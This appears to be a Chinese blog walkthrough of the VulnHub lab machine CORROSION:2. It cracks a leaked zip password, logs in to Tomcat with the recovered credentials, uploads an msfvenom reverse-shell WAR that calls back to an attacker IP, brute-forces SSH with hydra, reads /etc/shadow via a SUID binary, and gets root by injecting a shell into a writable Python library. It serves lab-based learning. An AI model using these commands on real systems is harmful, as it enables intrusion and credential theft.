CORROSION:2

已于 2023-10-31 21:11:31 修改
阅读量100 收藏
点赞数
文章标签: web安全 linux 网络安全
于 2023-10-31 21:07:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60481227/article/details/134144230
版权

CORROSION:2

前言:CORROSION系列第二个靶机,靶机下载地址:https://www.vulnhub.com/entry/corrosion-2,745/ 难度:Medium
Hint: Enumeration is key.
环境搭建:Vmware,靶机默认的是桥接模式联网

信息收集

使用nmap -sn 192.168.246.0/24对靶机所在网段进行主机存活探测。发现该网段中靶机地址是192.168.246.134
nmap主机探测
对靶机进行全端口扫描nmap -p- --min-rate 1000 192.168.246.134,使用-p-表示全端口即0~65535,–min-rate n表示每秒至少发n个数据包。
全端口扫描
从扫描的结果中可以看出该靶机开放了22、80、8080端口,接下来使用nmap对这些端口进行详细的TCP扫描。nmap -p22,80,8080 -sT -sC -sV --script=vuln 192.168.246.134,对靶机进行TCP全连接扫描,并使用默认的脚本进行漏洞探测。
靶机详细信息扫描
在扫描的结果中22和80端口没有特殊的信息,80端口是apache的默认页面。8080号端口部署的是tomcat,使用默认脚本扫描发现了存在一个backup.zip文件和一些目录结构。

80端口apache默认页
tomcat

从web服务进行突破,对80和8080端口均进行目录扫描,这里使用dirsaerch和feroxbuster 进行爆破。
feroxbuster -u http://192.168.246.134/ -w=/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
在这里插入图片描述80端口还是未发现其他文件可目录。使用dirsearch对8080进行爆破dirsearch -u http://192.168.246.134
在这里插入图片描述
除了nmap扫描到的backup.zip外也没发现其他的信息。此时,信息收集在这台靶机上差不多就完成了。

备份文件泄露

对最可能存在漏洞点的8080端口的tomcat进行深度挖掘。尝试登录manager。使用tomcat/tomcat, admin/admin 等都未成功。于是下载备份文件看看。
在这里插入图片描述

爆破zip密码

解压需要密码,同样使用zip2john和john爆破一下密码。zip2john ./backup.zip > pass
在这里插入图片描述
再使用john对pass进行撞库 john -w=/usr/share/wordlists/rockyou.txt pass
在这里插入图片描述
得到密码:@administrator_hi5
解密backup.zip文件,得到一些tomcat的配置文件。
在这里插入图片描述
查看这些文件时,在tomcat-users.xml发现一对账密:admin/melehifokivai
在这里插入图片描述
使用这对账密登录一下tomcat的管理页面。成功登录
在这里插入图片描述

部署war后门

使用msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.246.128 LPORT=80 -f war -o revshell.war生成一个war后门,然后上传上去。
在这里插入图片描述
然后在本机监听80端口,再访问后门。成功得到tomcat的shell。
在这里插入图片描述
查看/etc/passwd文件发现4个用户有登录权限。先都记录下来备用。
在这里插入图片描述
发现tomcat有一个定时任务,这里没什么用处。。
在这里插入图片描述
上传pspy,也没有发现其他的定时任务等可以利用的信息
在这里插入图片描述

用户密码枚举

使用在/etc/passwd中发现的用户名和tomcat-users.xml中的密码进行撞库。
用户名字典:userlist
userlist
密码字典:pass
在这里插入图片描述
使用hydra进行ssh的枚举爆破:hydra -L userlist -P passwd ssh:192.168.246.134
在这里插入图片描述
发现可以登录到aye用户。

普通用户ssh权限

这里再查看一下有哪些具有SUID权限的文件find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
发现一个home/jaye/Files/look文件比较特殊,并发现可以进行越权操作。利用方式
在这里插入图片描述
利用方式如:home/jaye/Files/look '' "/etc/shadow"

SUID 越权查看影子文件

这里通过look可以查看到任意文件,通过这个就想到直接查看root.txt文件。但是为了得到root的shell就看能不能通过破解一下shadow文件得到其他用户的权限进行提权。
使用home/jaye/Files/look查看/etc/shadow、/root/root.txt等文件。
在这里插入图片描述
将shadow和passwd文件一起进行爆破。先用unshadow shadow passwd > unshadow得到一个使用john破解的文件,再使用john破解。
在这里插入图片描述
这里花了块1个小时的时间才破解出一个密码。。也没发现其他的可以利用的信息。于是将root和randy用户的hash单独提出来进行爆破。
在这里插入图片描述
成功爆破出randy的密码:07051986randy.
切换到randy用户查看是否能进行提权。
登录到randy用户,发现可以无密码以root权限去执行一个python脚本。
在这里插入图片描述
这个脚本就是调用base64的库然后进行base64加密和解密的操作功能的。
在这里插入图片描述
但是randy用户没有修改的权限。
在这里插入图片描述
看是否可以修改base64这个库文件进行提权。查看base64库文件在哪find / -name "*base64.py" 2>/dev/null
在这里插入图片描述
/usr/lib/python3.8/base64.py具有可读可写的权限。
在这里插入图片描述
在/usr/lib/python3.8/base64.py中插入一个获取shell的代码,再以sudo权限去执行就可以得到root权限了。如下,在该文件中加入一个使用os.system('/bin/bash')让其在运行时获取一个bash环境。
在这里插入图片描述

获取Root权限

运行sudo /usr/bin/python3.8 /home/randy/randombase64.py获取root权限。
在这里插入图片描述

总结

这两个靶机中主要是对爆破、密码复用的运用,包括参数、密码爆破等,整体的思路较为简单。然后在查看其他打靶文章时发现在tomcat的shell下就可以利用polkit-agent-helper-1的CVE-2021-4034漏洞进行提权了,但是后面没有复现成功。

参考资料:
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat#metasploit
https://gtfobins.github.io/gtfobins/look/#suid
vulnhub靶场——CORROSION:2_corrosion 2_Czheisenberg的博客-CSDN博客

qq_60481227
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
corrosion:用于Rust的高性能缓存库
03-05
2. **主要数据结构** - **HashMap缓存**:基于哈希映射的数据结构,提供键值对的快速查找和存储。 - **LinkedList缓存**:用于实现LRU策略,按访问顺序排列缓存项,最近最少使用的项会被优先移除。 3. **API使用...
corrosion:Eclipse Corrosion-Eclipse IDE中的Rust版本
05-04
Corrosion是Eclipse IDE的Rust开发插件,通过与Rust Analyzer语言服务器,CargoRunner和gdb调试器集成,提供了丰富的版本体验。 下载/安装 腐蚀 从成熟的Eclipse IDE进行Rust开发。 或者 在您的计算机上正确安装了...
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
Aluxian_的博客
06-26 1173
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度中偏上 因为比较麻烦1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.文件包含漏洞,包含日志文件ssh写入木马ssh ''@靶机(新知识点!3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip。
vulnhub靶场——CORROSION:2
Czheisenberg的博客
02-16 3093
vulnhub靶场——CORROSION:2 Wirteup
Vulnhub——Corrosion:2靶机
Re1_zf的博客
11-28 299
使用john对压缩包密码进行一下破解zip2john backup.zip > pass.txt //先用zip2john爆出hash文件john --wordlist=/usr/share/wordlists/rockyou.txt //再用john结合字典爆出密码。
VulnHUb日记(十四): Corrosion:2
Dawn_Xi的博客
11-25 439
参考链接 Vulnhub:Corrosion:2 参考博客 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.135 fping 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.135 开启了80和8080两个http服务,分别访问 gobuster 枚举目录,在8080端口目录下 gobuster dir --url 192.168.56.135:8080 -w /usr/share/seclists/Disco
vulnhub-Corrosion: 2
qq_43006864的博客
05-12 501
Corrosion: 2 ~ VulnHub 靶机:Corrosion: 2 ~ VulnHub 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: nmap -sS -sV -A -p- 192.168.1.108 主机开放了三个端口。 访问一下80和8080 分别是Apache和Tomcat中间件的界面。没啥发现,开始目.
Vulnhub靶机:Corrosion 2
qq_48904485的博客
01-10 902
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:corrosion:2(10.0.2.13)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-2,745/
vulnhub靶机-Corrosion:2
臭nana的博客
05-03 634
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22、80和8080端口
vulnhub吧唧——CORROSION: 2
xstlikeja的博客
08-03 47
总结:这个吧唧主要的一些知识点就是爆破压缩包密码,根据tomcat的tomcat-users.xml文件获取账号密码,msfvenom构造jar文件反弹shell,信息搜集,look任意文件读取,john爆破密码,我觉得收货最多的就是,我学会了一个新的思路,在给定了root权限的具体命令时,更改其对应的配置文件,通过调用来达到触发恶意代码的效果。经过一番沉淀,我得到了一个新的思路。生成文件,上传文件都非常的一帆风顺,最后需要触发木马文件文件的时候告诉我文件被删掉了,看来是我沉淀的不够,我还得继续沉淀。
【Vulnhub靶场】CORROSION: 2
DG_s1mple
02-12 2070
环境准备 下载好靶机后导入到vmware里面 这没啥好说的 题目没给IP地址需要我们自己探测 攻击机IP地址为:192.168.2.16 靶机IP地址为:192.168.2.17 信息收集 使用arp-scan命令扫描靶机的IP地址 使用namp扫描靶机开放的端口 靶机开放了ssh和tomcat 渗透开始 首先访问80端口 很正常的一个页面,没有什么有用的信息,扫描路径也没有什么有用的结果 我们再访问8080端口 是一个tomcat的页面,我们也扫描一下路径 我们访问一下readme.txt
Corrosion:使用机器学习预测腐蚀速率
05-10
"Corrosion: 使用机器学习预测腐蚀速率"这个项目聚焦于利用这种技术来解决材料腐蚀的问题,这是工程领域的一大挑战。腐蚀会降低设备的寿命,增加维护成本,因此准确预测腐蚀速率对于预防性维护和设计更耐腐蚀的材料...
corrosion:一组用于Rust的测试实用程序
05-13
2. **测试覆盖率**:虽然Rust标准库不直接提供覆盖率工具,但corrosion可能集成了第三方库,帮助开发者测量代码覆盖率,从而了解测试的全面性。 3. **模拟和依赖注入**:在复杂的系统中,测试往往需要隔离和控制...
腐蚀matlab代码-Corrosion:用塔菲尔外推法计算腐蚀速率
05-22
在提供的"Corrosion-master"压缩包中,可能包含了实现这些步骤的Matlab源代码,如数据读取、预处理、图形绘制、曲线拟合和结果计算等函数。通过阅读和理解这些代码,可以学习到如何在实际项目中应用塔菲尔外推法进行...
网络安全的神秘世界】XSS基本概念和原理介绍
weixin_54750312的博客
07-09 779
恶意攻击者往web页面插入恶意代码脚本(JS代码),当用户浏览该页面时,嵌入web里面的JS代码会被执行,从而达到恶意攻击用户的目的。也叫持久型,常见的就是在博客留言版、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端,每次访问都会触发恶意代码。我们可以构造恶意代码,观察远程服务器web日志,只要网站管理员访问,它的cookie值就被盗取。发现恶意代码被浏览器保存到页面了,访问其他网页再回来,仍会造成攻击,这就叫持久型。像刚才的攻击流程,攻击一次立马失效,这就叫非持久型。
解读网络安全公司F5:助企业高效简化多云和应用部署
hanniuniu13的博客
07-09 380
在全球迈入数字时代和深入推进产业数智化的当下,F5在全球确立了应用交付、现代应用、应用安全、分布式云四个战略业务方向后,F5一直在积极推进该项战略在中国的落地。、简化已有的网络战略的具体实践中,F5与WWT和Google Cloud合作,利用解决方案帮助客户在多云环境中管理错综复杂的应用交付和安全问题。在WWT的实施支持和Google Cloud的基础设施基础之上,再运用F5提供的安全解决方案,让企业在过渡到云环境并在云环境中扩展时,能够保持一致的安全措施和卓越的用户体验。
网络安全那些梗
最新发布
weixin_73442302的博客
07-12 655
例如,“网络购物”本可以直接称为“购物”,“网络安全”则强调了安全概念在网络环境中的应用。:在注册网站时,网络安全界的人有时会采用“真电话+假名字”的方式填写个人信息,以应对可能的骚扰电话。一些笑话中,网络安全从业人员被误解为黑客,被亲戚朋友请求帮忙破解WiFi密码、盗取QQ号等,这实际上是对网络安全工程师工作的误解。:这个梗源自一个笑话,讲述了一位程序员因误解妻子的话而只买了一个包子回家,随后被领导提醒要进行安全检查扫描,程序员戏称“让网络彻底安全的最有效方法竟然是关掉服务器”。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1190
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
Good morning all teachers and students, my name is liangwenjun The topic of my report is Influence of molten salt potential on stress corrosion cracking behavior of 316 stainless steel. Stress corrosion cracking (SCC) is the cracking of sensitive materials resulting from the combined action of a fixed tensile stress and some specific corrosive medium.As shown in the picture on the right, Stress corrosion cracking is also one of the main causes of reactor structural material failure。 Structural materials for molten salt reactors must have good resistance to fluoride corrosion, excellent mechanical properties, good resistance to high temperature oxidation and irradiation Stainless steels such as 316 have ASME certification for high-temperature pile materials andare very economical.Therefore, many companies are considering 316 stainless steel as a structural material when designing molten salt reactors。Such as Kairos power and Terra power. 316 showed good corrosion resistance in purified molt en fluoride salt, and in Chen's study 316 did not crack with or without Cr addition under the synergistic effect of stress. Therefore, we accelerate corrosion by adding europium ion, and in the study to quantify the molten salt potential and stress magnitude, and finally determine the effect of molten salt potential on stress corrosion cracking of 316 stainless steel.
02-15
早上好,各位老师和同学们,我的名学是梁文军。我的报告的主题是:熔盐电位对316不锈钢应力腐蚀开裂行为的影响。 应力腐蚀开裂(SCC)是指敏感材料由固定的拉应力和某些特定腐蚀介质的结合作用导致的裂纹。如右图所示,应力腐蚀开裂也是反应堆结构材料失效的主要原因之一。 熔盐反应堆的结构材料必须具有良好的抗氟腐蚀性,优良的机械性能,良好的抗高温氧化和辐照抗性。316不锈钢具有高温堆材料的ASME认证,并且非常经济实惠。因此,许多公司在设计熔盐反应堆时考虑使用316不锈钢作为结构材料,例如Kairos power和Terra power。 316在纯化熔盐氟盐中表现出良好的抗腐蚀性,并且在陈的研究中,316在应力和腐蚀的协同作用下不会开裂,无论是否加入Cr。因此,我们通过添加欧拉金属离子来加速腐蚀,并在研究中量化熔盐电位和应力的大小,最终确定熔盐电位对316不锈钢应力腐蚀开裂的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值